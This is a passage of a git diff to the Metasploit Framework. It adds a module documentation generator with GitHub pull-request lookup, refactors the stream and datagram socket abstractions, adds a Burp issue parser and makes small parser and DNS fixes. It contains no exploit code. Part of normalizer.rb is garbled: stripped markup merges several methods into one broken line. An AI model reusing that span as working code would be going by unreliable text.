ModuleCommandDispatcher print_error("Check failed: #{e.message}") elog("#{e.message}\n#{e.backtrace.join("\n")}") rescue ::Exception => e - print_error("#{peer} - Check failed: #{e.class} #{e}") + print_error("Check failed: #{e.class} #{e}") elog("#{e.message}\n#{e.backtrace.join("\n")}") end end diff --git a/lib/msf/util.rb b/lib/msf/util.rb index 6ce2bdd01e..7439f57d30 100644 --- a/lib/msf/util.rb +++ b/lib/msf/util.rb @@ -21,7 +21,3 @@ end # Executable generation and encoding require 'msf/util/exe' - -# Parse SVN entries -require 'msf/util/svn' - diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb new file mode 100644 index 0000000000..cd17faacfc --- /dev/null +++ b/lib/msf/util/document_generator.rb @@ -0,0 +1,74 @@ +### +# +# This provides methods to generate documentation for a module. +# +### + +require 'msf/util/document_generator/pull_request_finder' +require 'msf/util/document_generator/normalizer' + +module Msf + module Util + module DocumentGenerator + + + # Spawns a module document with a browser locally. + # + # @param mod [Msf::Module] Module to create document for. + # @return [void] + def self.spawn_module_document(mod) + md = get_module_document(mod) + f = Rex::Quickfile.new(["#{mod.shortname}_doc", '.html']) + f.write(md) + f.close + kb_path = f.path + + Rex::Compat.open_webrtc_browser("file://#{kb_path}") + end + + + # Returns a module document in HTML. + # + # @param mod [Msf::Module] Module to create document for. + # @return [void] + def self.get_module_document(mod) + md = '' + + kb_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, "#{mod.fullname}.md") + kb = '' + + if File.exists?(kb_path) + File.open(kb_path, 'rb') { |f| kb = f.read } + end + + begin + pr_finder = PullRequestFinder.new + pr = pr_finder.search(mod) + rescue PullRequestFinder::Exception => e + pr = e + end + + n = DocumentNormalizer.new + items = { + mod_description: mod.description, + mod_authors: mod.send(:module_info)['Author'], + mod_fullname: mod.fullname, + mod_name: mod.name, + mod_pull_requests: pr, + mod_refs: mod.references, + mod_rank: mod.rank, + mod_platforms: mod.send(:module_info)['Platform'], + mod_options: mod.options, + mod_demo: mod + } + + if mod.respond_to?(:targets) && mod.targets + items[:mod_targets] = mod.targets + end + + n.get_md_content(items, kb) + end + + end + end +end diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb new file mode 100644 index 0000000000..788204b650 --- /dev/null +++ b/lib/msf/util/document_generator/normalizer.rb @@ -0,0 +1,288 @@ +require 'redcarpet' +require 'erb' + +module Redcarpet + module Render + class MsfMdHTML < Redcarpet::Render::HTML + + def block_code(code, language) + "
" \
+          "#{code}" \
+        "
" + end + + + def list(content, list_type) + if list_type == :unordered && content.scan(/
  • /).flatten.length > 15 + %Q|

      #{content}

      | + elsif list_type == :unordered + %Q|
        #{content}
      | + elsif list_type == :ordered + %Q|
        #{content}
      | + else + content + end + end + + def header(text, header_level) + %Q|#{text}
      | + end + + def table(header, body) + %Q|#{header}#{body}

      | + end + + end + end +end + + +module Msf + module Util + module DocumentGenerator + class DocumentNormalizer + + # + # Markdown templates + # + + CSS_BASE_PATH = 'markdown.css' + HTML_TEMPLATE = 'html_template.erb' + TEMPLATE_PATH = 'default_template.erb' + + # + # Demo templates + # + + REMOTE_EXPLOIT_DEMO_TEMPLATE = 'remote_exploit_demo_template.erb' + BES_DEMO_TEMPLATE = 'bes_demo_template.erb' + HTTPSERVER_DEMO_TEMPLATE = 'httpserver_demo_template.erb' + GENERIC_DEMO_TEMPLATE = 'generic_demo_template.erb' + LOCALEXPLOIT_DEMO_TEMPLATE = 'localexploit_demo_template.erb' + POST_DEMO_TEMPLATE = 'post_demo_template.erb' + AUXILIARY_SCANNER_DEMO_TEMPLATE = 'auxiliary_scanner_template.erb' + PAYLOAD_DEMO_TEMPLATE = 'payload_demo_template.erb' + + + # Returns the module document in HTML form. + # + # @param items [Hash] Items to be documented. + # @param kb [String] Additional information to be added in the doc. + # @return [String] HTML. + def get_md_content(items, kb) + @md_template ||= lambda { + template = '' + path = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', TEMPLATE_PATH)) + File.open(path, 'rb') { |f| template = f.read } + return template + }.call + md_to_html(ERB.new(@md_template).result(binding()), kb.gsub(/##{number} - #{pr[:title]}" + end + + formatted_pr * "\n" + end + + + # Returns the markdown format for module datastore options. + # + # @param mod_options [Hash] Datastore options + # @return [String] + def normalize_options(mod_options) + required_options = [] + + mod_options.each_pair do |name, props| + if props.required && props.default.nil? + required_options << "* #{name} - #{props.desc}" + end + end + + required_options * "\n" + end + + + # Returns the markdown format for module description. + # + # @param description [String] Module description. + # @return [String] + def normalize_description(description) + Rex::Text.wordwrap(Rex::Text.compress(description)) + end + + + # Returns the markdown format for module authors. + # + # @param authors [Array] Module Authors + # @param authors [String] Module author + # @return [String] + def normalize_authors(authors) + if authors.kind_of?(Array) + authors.collect { |a| "* #{Rex::Text.html_encode(a)}" } * "\n" + else + authors + end + end + + + # Returns the markdown format for module targets. + # + # @param targets [Array] Module targets. + # @return [String] + def normalize_targets(targets) + targets.collect { |c| "* #{c.name}" } * "\n" + end + + + # Returns the markdown format for module references. + # + # @param refs [Array] Module references. + # @return [String] + def normalize_references(refs) + refs.collect { |r| "* #{r}" } * "\n" + end + + + # Returns the markdown format for module platforms. + # + # @param platforms [Array] Module platforms. + # @param platforms [String] Module platform. + # @return [String] + def normalize_platforms(platforms) + if platforms.kind_of?(Array) + platforms.collect { |p| "* #{p}" } * "\n" + else + platforms + end + end + + + # Returns the markdown format for module rank. + # + # @param rank [String] Module rank. + # @return [String] + def normalize_rank(rank) + "[#{Msf::RankingName[rank].capitalize}](https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking)" + end + + + # Returns a parsed demo ERB template. + # + # @param mod [Msf::Module] Metasploit module. + # @param path [String] Template path. + # @return [String] + def load_demo_template(mod, path) + data = '' + path = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', path)) + File.open(path, 'rb') { |f| data = f.read } + ERB.new(data).result(binding()) + end + + + # Returns whether the module is a remote exploit or not. + # + # @param mod [Msf::Module] Metasploit module. + # @return [TrueClass] Module is a remote exploit. + # @return [FalseClass] Module is not really a remote exploit. + def is_remote_exploit?(mod) + # It's actually a little tricky to determine this, so we'll try to be as + # specific as possible. Rather have false negatives than false positives, + # because the worst case would be using the generic demo template. + mod.type == 'exploit' && # Must be an exploit + mod.kind_of?(Msf::Exploit::Remote) && # Should always have this + !mod.kind_of?(Msf::Exploit::FILEFORMAT) && # Definitely not a file format + !mod.kind_of?(Msf::Exploit::Remote::TcpServer) && # If there is a server mixin, things might get complicated + mod.options['DisablePayloadHandler'] # Must allow this option + end + + + # Returns a demo template suitable for the module. Currently supported templates: + # BrowserExploitServer modules, HttpServer modules, local exploit modules, post + # modules, payloads, auxiliary scanner modules. + # + # @param mod [Msf::Module] Metasploit module. + # @return [String] + def normalize_demo_output(mod) + if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer) && mod.shortname != 'browser_autopwn2' + load_demo_template(mod, BES_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Exploit::Remote::HttpServer) + load_demo_template(mod, HTTPSERVER_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Exploit::Local) + load_demo_template(mod, LOCALEXPLOIT_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Post) + load_demo_template(mod, POST_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Payload) + load_demo_template(mod, PAYLOAD_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Auxiliary::Scanner) + load_demo_template(mod, AUXILIARY_SCANNER_DEMO_TEMPLATE) + elsif is_remote_exploit?(mod) + load_demo_template(mod, REMOTE_EXPLOIT_DEMO_TEMPLATE) + else + load_demo_template(mod, GENERIC_DEMO_TEMPLATE) + end + end + + end + end + end +end diff --git a/lib/msf/util/document_generator/pull_request_finder.rb b/lib/msf/util/document_generator/pull_request_finder.rb new file mode 100644 index 0000000000..d509df88bf --- /dev/null +++ b/lib/msf/util/document_generator/pull_request_finder.rb @@ -0,0 +1,166 @@ +require 'octokit' +require 'nokogiri' +require 'net/http' + +module Msf + module Util + module DocumentGenerator + + class PullRequestFinder + + class Exception < RuntimeError; end + + MANUAL_BASE_PATH = File.expand_path(File.join(Msf::Config.module_directory, '..', 'documentation', 'modules' )) + + # @return [Octokit::Client] Git client + attr_accessor :git_client + + # @return [String] Metasploit Framework's repository + attr_accessor :repository + + # @return [String] Metasploit Framework's branch + attr_accessor :branch + + # @return [String] Metasploit Framework's repository owner + attr_accessor :owner + + # @return [String] Git access token + attr_accessor :git_access_token + + + # Initializes Msf::Util::DocumenGenerator::PullRequestFinder + # + # @raise [PullRequestFinder::Exception] No GITHUB_OAUTH_TOKEN environment variable + # @return [void] + def initialize + unless ENV.has_key?('GITHUB_OAUTH_TOKEN') + msg = '' + raise PullRequestFinder::Exception, 'GITHUB_OAUTH_TOKEN environment variable not set.' + end + + self.owner = 'rapid7' + self.repository = "#{owner}/metasploit-framework" + self.branch = 'master' + self.git_access_token = ENV['GITHUB_OAUTH_TOKEN'] + self.git_client = Octokit::Client.new(access_token: git_access_token) + end + + + # Returns pull requests associated with a particular Metasploit module. + # + # @param mod [Msf::Module] Metasploit module. + # @return [Hash] + def search(mod) + file_name = get_normalized_module_name(mod) + commits = get_commits_from_file(file_name) + get_pull_requests_from_commits(commits) + end + + + private + + + # Returns the normalized module full name. + # + # @param mod [Msf::Module] Metasploit module. + # @return [String] + def get_normalized_module_name(mod) + source_fname = mod.method(:initialize).source_location.first + source_fname.scan(/(modules.+)/).flatten.first || '' + end + + + # Returns git commits for a particular file. + # + # @param path [String] File path. + # @raise [PullRequestFinder::Exception] No commits found. + # @return [Array] + def get_commits_from_file(path) + begin + commits = git_client.commits(repository, branch, path: path) + rescue Faraday::ConnectionFailed + raise PullRequestFinder::Exception, 'No network connection to Github.' + end + + if commits.empty? + # Possibly the path is wrong. + raise PullRequestFinder::Exception, 'No commits found.' + end + + commits + end + + + # Returns the author for the commit. + # + # @param commit [Sawyer::Resource] + # @return [String] + def get_author(commit) + if commit.author + return commit.author[:login].to_s + end + + '' + end + + + # Checks whether the author should be skipped or not. + # + # @param commit [Sawyer::Resource] + # @return [Boolean] TrueClass if the author should be skipped, otherwise false. + def is_author_blacklisted?(commit) + ['tabassassin'].include?(get_author(commit)) + end + + + # Returns unique pull requests for a collection of commits. + # + # @param commits [Array] + # @return [Hash] + def get_pull_requests_from_commits(commits) + pull_requests = {} + + commits.each do |commit| + next if is_author_blacklisted?(commit) + + pr = get_pull_request_from_commit(commit) + unless pr.empty? + pull_requests[pr[:number]] = pr + end + end + + pull_requests + end + + + # Returns unique pull requests for a commit. + # + # @param commit [Sawyer::Resource] + # @return [Hash] + def get_pull_request_from_commit(commit) + sha = commit.sha + url = URI.parse("https://github.com/#{repository}/branch_commits/#{sha}") + cli = Net::HTTP.new(url.host, url.port) + cli.use_ssl = true + req = Net::HTTP::Get.new(url.request_uri) + res = cli.request(req) + n = Nokogiri::HTML(res.body) + found_pr_link = n.at('li[@class="pull-request"]//a') + + # If there is no PR associated with this commit, it's probably from the SVN days. + return {} unless found_pr_link + + href = found_pr_link.attributes['href'].text + title = found_pr_link.attributes['title'].text + + # Filter out all the pull requests that do not belong to rapid7. + # If this happens, it's probably because the PR was submitted to somebody's fork. + return {} unless /^\/#{owner}\// === href + + { number: href.scan(/\d+$/).flatten.first, title: title } + end + end + + end + end +end diff --git a/lib/msf/util/svn.rb b/lib/msf/util/svn.rb deleted file mode 100644 index 8b5f10175a..0000000000 --- a/lib/msf/util/svn.rb +++ /dev/null @@ -1,120 +0,0 @@ -# -*- coding: binary -*- -### -# -# framework-util-svn -# -------------- -# -# The class provides methods for parsing the SVN information in the framework directory -# -### - -require 'date' - -module Msf -module Util -class SVN - - def self.load_root - info = {} - path = ::File.join(::File.dirname(__FILE__), "..", "..", "..", ".svn", "entries") - if !::File.exists?(path) - return info - end - contents = '' - File.open(path, "rb") do |fd| - contents = fd.read(::File.size(path)) - end - if contents.include? " 7) - "%red#{diff.to_i} days ago%clr" - else - "#{diff.to_i} days ago" - end - end - end - - def self.last_updated_date - @@info ||= load_root - svnt = @@info[:updated] - if(not svnt) - return - end - begin - Date.parse(@@info[:updated]) - rescue ArgumentError - end - end - -end -end -end - diff --git a/lib/net/dns/names/names.rb b/lib/net/dns/names/names.rb index d65c8bf293..b483368877 100644 --- a/lib/net/dns/names/names.rb +++ b/lib/net/dns/names/names.rb @@ -46,12 +46,15 @@ module Net # :nodoc: end def pack_name(name) - if name.size > 63 - raise ArgumentError, "Label data cannot exceed 63 chars" + if name.size > 255 + raise ArgumentError, "Name data cannot exceed 255 chars" end arr = name.split(".") str = "" arr.each do |elem| + if elem.size > 63 + raise ArgumentError, "Label data cannot exceed 63 chars" + end str += [elem.size,elem].pack("Ca*") end str += [0].pack("C") diff --git a/lib/net/ssh/transport/session.rb b/lib/net/ssh/transport/session.rb index 3bd4e33f66..515c681901 100644 --- a/lib/net/ssh/transport/session.rb +++ b/lib/net/ssh/transport/session.rb @@ -65,9 +65,10 @@ module Net; module SSH; module Transport factory = options[:proxy] if (factory) - @socket = timeout(options[:timeout] || 0) { factory.open(@host, @port) } + @socket = ::Timeout.timeout(options[:timeout] || 0) { factory.open(@host, +@port) } else - @socket = timeout(options[:timeout] || 0) { + @socket = ::Timeout.timeout(options[:timeout] || 0) { Rex::Socket::Tcp.create( 'PeerHost' => @host, 'PeerPort' => @port, diff --git a/lib/rex/compat.rb b/lib/rex/compat.rb index 46d61dae15..4a4564a7a5 100644 --- a/lib/rex/compat.rb +++ b/lib/rex/compat.rb @@ -149,8 +149,6 @@ def self.open_browser(url='http://google.com/') end def self.open_webrtc_browser(url='http://google.com/') - found_browser = false - case RUBY_PLATFORM when /mswin2|mingw|cygwin/ paths = [ @@ -169,9 +167,8 @@ def self.open_webrtc_browser(url='http://google.com/') paths.each do |path| if File.exists?(path) args = (path =~ /chrome\.exe/) ? "--allow-file-access-from-files" : "" - system("#{path} #{args} #{url}") - found_browser = true - break + system("\"#{path}\" #{args} \"#{url}\"") + return true end end @@ -182,27 +179,25 @@ def self.open_webrtc_browser(url='http://google.com/') args = (browser_path =~ /Chrome/) ? "--args --allow-file-access-from-files" : "" system("open #{url} -a \"#{browser_path}\" #{args} &") - found_browser = true - break + return true end end else if defined? ENV['PATH'] - ['firefox', 'google-chrome', 'chrome', 'chromium', 'firefox', 'opera'].each do |browser| + ['google-chrome', 'chrome', 'chromium', 'firefox' , 'firefox', 'opera'].each do |browser| ENV['PATH'].split(':').each do |path| browser_path = "#{path}/#{browser}" if File.exists?(browser_path) args = (browser_path =~ /Chrome/) ? "--allow-file-access-from-files" : "" system("#{browser_path} #{args} #{url} &") - found_browser = true - break + return true end end end end end - found_browser + false end def self.open_email(addr) diff --git a/lib/rex/exploitation/js/memory.rb b/lib/rex/exploitation/js/memory.rb index f8fb22c77e..a0a9d08e78 100644 --- a/lib/rex/exploitation/js/memory.rb +++ b/lib/rex/exploitation/js/memory.rb @@ -27,7 +27,7 @@ class Memory def self.heaplib2(custom_js='', opts={}) js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "heaplib2.js")) - unless custom_js.blank? + unless custom_js.to_s.strip.empty? js << custom_js end diff --git a/lib/rex/io/datagram_abstraction.rb b/lib/rex/io/datagram_abstraction.rb index e1b17a1d6c..bf9492dfa2 100644 --- a/lib/rex/io/datagram_abstraction.rb +++ b/lib/rex/io/datagram_abstraction.rb @@ -1,6 +1,6 @@ # -*- coding: binary -*- -require 'socket' +require 'rex/io/socket_abstraction' module Rex module IO @@ -12,24 +12,15 @@ module IO # ### module DatagramAbstraction + include Rex::IO::SocketAbstraction # # Creates a streaming socket pair # def initialize_abstraction - self.lsock, self.rsock = Rex::Socket.udp_socket_pair() + self.lsock, self.rsock = Rex::Socket.udp_socket_pair end - - # The left side of the stream (local) - attr_reader :lsock - # The right side of the stream (remote) - attr_reader :rsock - -protected - attr_writer :lsock - attr_writer :rsock - end end; end diff --git a/lib/rex/io/socket_abstraction.rb b/lib/rex/io/socket_abstraction.rb new file mode 100644 index 0000000000..c010c8a1b9 --- /dev/null +++ b/lib/rex/io/socket_abstraction.rb @@ -0,0 +1,205 @@ +# -*- coding: binary -*- + +require 'socket' +require 'fcntl' + +module Rex +module IO + +### +# +# This class provides an abstraction to a stream based +# connection through the use of a streaming socketpair. +# +### +module SocketAbstraction + + ### + # + # Extension information for required Stream interface. + # + ### + module Ext + + # + # Initializes peer information. + # + def initinfo(peer,local) + @peer = peer + @local = local + end + + # + # Symbolic peer information. + # + def peerinfo + (@peer || "Remote Pipe") + end + + # + # Symbolic local information. + # + def localinfo + (@local || "Local Pipe") + end + end + + # + # Override this method to init the abstraction + # + def initialize_abstraction + self.lsock, self.rsock = Rex::Compat.pipe + end + + # + # This method cleans up the abstraction layer. + # + def cleanup_abstraction + self.lsock.close if (self.lsock and !self.lsock.closed?) + self.rsock.close if (self.rsock and !self.rsock.closed?) + + self.lsock = nil + self.rsock = nil + end + + # + # Low-level write to the local side. + # + def syswrite(buffer) + lsock.syswrite(buffer) + end + + # + # Low-level read from the local side. + # + def sysread(length) + lsock.sysread(length) + end + + # + # Shuts down the local side of the stream abstraction. + # + def shutdown(how) + lsock.shutdown(how) + end + + # + # Closes both sides of the stream abstraction. + # + def close + cleanup_abstraction + super + end + + # + # Symbolic peer information. + # + def peerinfo + "Remote-side of Pipe" + end + + # + # Symbolic local information. + # + def localinfo + "Local-side of Pipe" + end + + # + # The left side of the stream. + # + attr_reader :lsock + # + # The right side of the stream. + # + attr_reader :rsock + +protected + + def monitor_rsock(threadname = "SocketMonitorRemote") + self.monitor_thread = Rex::ThreadFactory.spawn(threadname, false) { + loop do + closed = false + buf = nil + + if not self.rsock + wlog("monitor_rsock: the remote socket is nil, exiting loop") + break + end + + begin + s = Rex::ThreadSafe.select( [ self.rsock ], nil, nil, 0.2 ) + if( s == nil || s[0] == nil ) + next + end + rescue Exception => e + wlog("monitor_rsock: exception during select: #{e.class} #{e}") + closed = true + end + + if( closed == false ) + begin + buf = self.rsock.sysread( 32768 ) + if buf == nil + closed = true + wlog("monitor_rsock: closed remote socket due to nil read") + end + rescue EOFError => e + closed = true + dlog("monitor_rsock: EOF in rsock") + rescue ::Exception => e + closed = true + wlog("monitor_rsock: exception during read: #{e.class} #{e}") + end + end + + if( closed == false ) + total_sent = 0 + total_length = buf.length + while( total_sent < total_length ) + begin + data = buf[total_sent, buf.length] + + # Note that this must be write() NOT syswrite() or put() or anything like it. + # Using syswrite() breaks SSL streams. + sent = self.write( data ) + + # sf: Only remove the data off the queue is write was successfull. + # This way we naturally perform a resend if a failure occured. + # Catches an edge case with meterpreter TCP channels where remote send + # failes gracefully and a resend is required. + if (sent.nil?) + closed = true + wlog("monitor_rsock: failed writing, socket must be dead") + break + elsif (sent > 0) + total_sent += sent + end + rescue ::IOError, ::EOFError => e + closed = true + wlog("monitor_rsock: exception during write: #{e.class} #{e}") + break + end + end + end + + if( closed ) + begin + self.close_write if self.respond_to?('close_write') + rescue IOError + end + break + end + end + } + end + +protected + attr_accessor :monitor_thread + attr_writer :lsock + attr_writer :rsock + +end + +end; end + diff --git a/lib/rex/io/stream_abstraction.rb b/lib/rex/io/stream_abstraction.rb index c2bfb5d4a2..837cfd945a 100644 --- a/lib/rex/io/stream_abstraction.rb +++ b/lib/rex/io/stream_abstraction.rb @@ -1,7 +1,6 @@ # -*- coding: binary -*- -require 'socket' -require 'fcntl' +require 'rex/io/socket_abstraction' module Rex module IO @@ -13,36 +12,7 @@ module IO # ### module StreamAbstraction - - ### - # - # Extension information for required Stream interface. - # - ### - module Ext - - # - # Initializes peer information. - # - def initinfo(peer,local) - @peer = peer - @local = local - end - - # - # Symbolic peer information. - # - def peerinfo - (@peer || "Remote Pipe") - end - - # - # Symbolic local information. - # - def localinfo - (@local || "Local Pipe") - end - end + include Rex::IO::SocketAbstraction # # This method creates a streaming socket pair and initializes it. @@ -53,156 +23,9 @@ module StreamAbstraction self.lsock.extend(Ext) self.rsock.extend(Rex::IO::Stream) - self.monitor_rsock + self.monitor_rsock("StreamMonitorRemote") end - # - # This method cleans up the abstraction layer. - # - def cleanup_abstraction - self.lsock.close if (self.lsock) - self.rsock.close if (self.rsock) - - self.lsock = nil - self.rsock = nil - end - - # - # Low-level write to the local side. - # - def syswrite(buffer) - lsock.syswrite(buffer) - end - - # - # Low-level read from the local side. - # - def sysread(length) - lsock.sysread(length) - end - - # - # Shuts down the local side of the stream abstraction. - # - def shutdown(how) - lsock.shutdown(how) - end - - # - # Closes both sides of the stream abstraction. - # - def close - cleanup_abstraction - end - - # - # Symbolic peer information. - # - def peerinfo - "Remote-side of Pipe" - end - - # - # Symbolic local information. - # - def localinfo - "Local-side of Pipe" - end - - # - # The left side of the stream. - # - attr_reader :lsock - # - # The right side of the stream. - # - attr_reader :rsock - -protected - - def monitor_rsock - self.monitor_thread = Rex::ThreadFactory.spawn("StreamMonitorRemote", false) { - loop do - closed = false - buf = nil - - if not self.rsock - wlog("monitor_rsock: the remote socket is nil, exiting loop") - break - end - - begin - s = Rex::ThreadSafe.select( [ self.rsock ], nil, nil, 0.2 ) - if( s == nil || s[0] == nil ) - next - end - rescue Exception => e - wlog("monitor_rsock: exception during select: #{e.class} #{e}") - closed = true - end - - if( closed == false ) - begin - buf = self.rsock.sysread( 32768 ) - if buf == nil - closed = true - wlog("monitor_rsock: closed remote socket due to nil read") - end - rescue EOFError => e - closed = true - dlog("monitor_rsock: EOF in rsock") - rescue ::Exception => e - closed = true - wlog("monitor_rsock: exception during read: #{e.class} #{e}") - end - end - - if( closed == false ) - total_sent = 0 - total_length = buf.length - while( total_sent < total_length ) - begin - data = buf[total_sent, buf.length] - - # Note that this must be write() NOT syswrite() or put() or anything like it. - # Using syswrite() breaks SSL streams. - sent = self.write( data ) - - # sf: Only remove the data off the queue is write was successfull. - # This way we naturally perform a resend if a failure occured. - # Catches an edge case with meterpreter TCP channels where remote send - # failes gracefully and a resend is required. - if (sent.nil?) - closed = true - wlog("monitor_rsock: failed writing, socket must be dead") - break - elsif (sent > 0) - total_sent += sent - end - rescue ::IOError, ::EOFError => e - closed = true - wlog("monitor_rsock: exception during write: #{e.class} #{e}") - break - end - end - end - - if( closed ) - begin - self.close_write if self.respond_to?('close_write') - rescue IOError - end - break - end - end - } - end - -protected - attr_accessor :monitor_thread - attr_writer :lsock - attr_writer :rsock - end end; end diff --git a/lib/rex/mime/message.rb b/lib/rex/mime/message.rb index 150a7c081b..205f561350 100644 --- a/lib/rex/mime/message.rb +++ b/lib/rex/mime/message.rb @@ -126,7 +126,7 @@ class Message header_string = self.header.to_s msg = header_string.empty? ? '' : force_crlf(self.header.to_s + "\r\n") - msg << force_crlf(self.content + "\r\n") unless self.content.blank? + msg << force_crlf(self.content + "\r\n") unless self.content.to_s.strip.empty? self.parts.each do |part| msg << force_crlf("--" + self.bound + "\r\n") diff --git a/lib/rex/parser/appscan_nokogiri.rb b/lib/rex/parser/appscan_nokogiri.rb index 438eb9cb6a..fa9641e2af 100644 --- a/lib/rex/parser/appscan_nokogiri.rb +++ b/lib/rex/parser/appscan_nokogiri.rb @@ -195,7 +195,7 @@ module Rex res_header = Rex::Proto::Http::Packet::Header.new req_header.from_s request_headers.lstrip res_header.from_s response_headers.lstrip - if response_body.blank? + if response_body.to_s.empty? response_body = '' end @state[:request_headers] = req_header diff --git a/lib/rex/parser/burp_issue_nokogiri.rb b/lib/rex/parser/burp_issue_nokogiri.rb new file mode 100644 index 0000000000..c14ec9c869 --- /dev/null +++ b/lib/rex/parser/burp_issue_nokogiri.rb @@ -0,0 +1,139 @@ +# -*- coding: binary -*- +require "rex/parser/nokogiri_doc_mixin" +require 'uri' + +module Rex + module Parser + + # If Nokogiri is available, define Burp Issue document class. + load_nokogiri && class BurpIssueDocument < Nokogiri::XML::SAX::Document + + include NokogiriDocMixin + + def start_element(name=nil,attrs=[]) + attrs = normalize_attrs(attrs) + block = @block + @state[:current_tag][name] = true + case name + when "host", "name", "info", "issueDetail", "references" + @state[:has_text] = true + end + end + + def end_element(name=nil) + block = @block + case name + when "issue" + report_web_host_info + report_web_service_info + report_vuln + # Reset the state once we close a host + @state = @state.select {|k| [:current_tag].include? k} + when "host" + @state[:has_text] = false + collect_host_info + @text = nil + when "name" + @state[:has_text] = false + collect_name + @text = nil + when "issueDetail" + @state[:has_text] = false + collect_issue_detail + @text = nil + when "references" + @state[:has_text] = false + collect_references + @text = nil + end + @state[:current_tag].delete name + end + + def collect_host_info + return unless in_issue + return unless has_text + uri = URI(@text) + + @state[:host] = uri.host + @state[:service_name] = uri.scheme + @state[:proto] = "tcp" + + case @state[:service_name] + when "http" + @state[:port] = 80 + when "https" + @state[:port] = 443 + end + end + + def collect_name + return unless in_issue + return unless has_text + @state[:vuln_name] = @text + end + + def collect_issue_detail + return unless in_issue + return unless has_text + @state[:issue_detail] = @text + end + + def collect_references + return unless in_issue + return unless has_text + uri = @text.match('href=[\'"]?([^\'" >]+)')[1] + @state[:refs] = ["URI-#{uri}"] + end + + def report_web_host_info + return unless @state[:host] + address = Rex::Socket.resolv_to_dotted(@state[:host]) rescue nil + host_info = {:workspace => @args[:wspace]} + host_info[:address] = address + host_info[:name] = @state[:host] + db_report(:host, host_info) + end + + def report_web_service_info + return unless @state[:host] + return unless @state[:port] + return unless @state[:proto] + return unless @state[:service_name] + service_info = {} + service_info[:host] = @state[:host] + service_info[:port] = @state[:port] + service_info[:proto] = @state[:proto] + service_info[:name] = @state[:service_name] + @state[:service_object] = db_report(:service, service_info) + end + + def report_vuln + return unless @state[:service_object] + return unless @state[:vuln_name] + return unless @state[:issue_detail] + return unless @state[:refs] + vuln_info = {} + vuln_info[:service_id] = @state[:service_object].id + vuln_info[:host] = @state[:host] + vuln_info[:name] = @state[:vuln_name] + vuln_info[:info] = @state[:issue_detail] + vuln_info[:refs] = @state[:refs] + @state[:vuln_object] = db_report(:vuln, vuln_info) + end + + def in_issue + return false unless in_tag("issue") + return false unless in_tag("issues") + return true + end + + def has_text + return false unless @text + return false if @text.strip.empty? + @text = @text.strip + end + end + + end +end + diff --git a/lib/rex/parser/burp_session_nokogiri.rb b/lib/rex/parser/burp_session_nokogiri.rb index 2822fa28bf..057c5dae53 100644 --- a/lib/rex/parser/burp_session_nokogiri.rb +++ b/lib/rex/parser/burp_session_nokogiri.rb @@ -157,7 +157,7 @@ module Rex host_info = {:workspace => @args[:wspace]} host_info[:address] = @state[:web_site].service.host.address host_info[:name] = @state[:uri].host - report_db(:host, host_info) + db_report(:host, host_info) end def report_web_service_info diff --git a/lib/rex/parser/fusionvm_nokogiri.rb b/lib/rex/parser/fusionvm_nokogiri.rb index 8af80d5747..a328a895bb 100644 --- a/lib/rex/parser/fusionvm_nokogiri.rb +++ b/lib/rex/parser/fusionvm_nokogiri.rb @@ -59,7 +59,7 @@ module Parser unless in_tag("JobOrder") case name when "OS" - unless @host.nil? or @text.blank? + unless @host.nil? or @text.to_s.strip.empty? tnote = { :type => "host.os.fusionvm_fingerprint", :data => { :os => @text.strip }, @@ -86,7 +86,7 @@ module Parser when "CVE" @vuln[:refs] << "CVE-#{@text.strip}" when "References" - unless @text.blank? + unless @text.to_s.strip.empty? @text.split(' ').each do |ref| next unless ref.start_with? "http" if ref =~ /MS\d{2}-\d{3}/ diff --git a/lib/rex/parser/nexpose_raw_nokogiri.rb b/lib/rex/parser/nexpose_raw_nokogiri.rb index 3d5ec218b1..78a681dba8 100644 --- a/lib/rex/parser/nexpose_raw_nokogiri.rb +++ b/lib/rex/parser/nexpose_raw_nokogiri.rb @@ -193,6 +193,13 @@ module Rex vuln_instances = @report_data[:vuln][:matches].size db.emit(:vuln, [refs.last,vuln_instances], &block) if block + # TODO: potential remove the size limit on this field, might require + # some additional UX + if @report_data[:vuln]['title'].length > 255 + db.emit :warning, 'Vulnerability name longer than 255 characters, truncating.', &block if block + @report_data[:vuln]['title'] = @report_data[:vuln]['title'][0..254] + end + vuln_ids = @report_data[:vuln][:matches].map{ |v| v[0] } vdet_ids = @report_data[:vuln][:matches].map{ |v| v[1] } diff --git a/lib/rex/parser/nokogiri_doc_mixin.rb b/lib/rex/parser/nokogiri_doc_mixin.rb index bfee26fa8c..9e59c56061 100644 --- a/lib/rex/parser/nokogiri_doc_mixin.rb +++ b/lib/rex/parser/nokogiri_doc_mixin.rb @@ -200,6 +200,11 @@ module Parser return attr_pairs end + # Removes HTML from a string + def strip_html_tags(text) + return text.gsub!(/(<[^>]*>)|\n|\t/s) {" "} + end + # This breaks xml-encoded characters, so need to append. # It's on the end_element tag name to turn the appending # off and clear out the data. diff --git a/lib/rex/parser/openvas_nokogiri.rb b/lib/rex/parser/openvas_nokogiri.rb index 07fd3c6b82..b38d034abe 100644 --- a/lib/rex/parser/openvas_nokogiri.rb +++ b/lib/rex/parser/openvas_nokogiri.rb @@ -4,7 +4,7 @@ require "rex/parser/nokogiri_doc_mixin" module Rex module Parser - # If Nokogiri is available, define OpenVAS document class. + # If Nokogiri is available, define OpenVas document class. load_nokogiri && class OpenVASDocument < Nokogiri::XML::SAX::Document include NokogiriDocMixin @@ -37,8 +37,10 @@ module Parser @state[:vuln_name] = @text.strip if @text end when 'description' - @state[:has_text] = true - @state[:vuln_desc] = @text.strip if @text + if in_tag('result') + @state[:has_text] = true + @state[:vuln_desc] = @text.strip if @text + end when 'bid' if in_tag('result') && in_tag('nvt') @state[:has_text] = true @@ -62,7 +64,7 @@ module Parser when 'subnet' @state[:has_text] = true when 'result' - record_vuln if in_tag('results') + record_vuln when 'threat' @state[:has_text] = true if in_tag('ports') && in_tag('port') when 'host' diff --git a/lib/rex/post/meterpreter/channel.rb 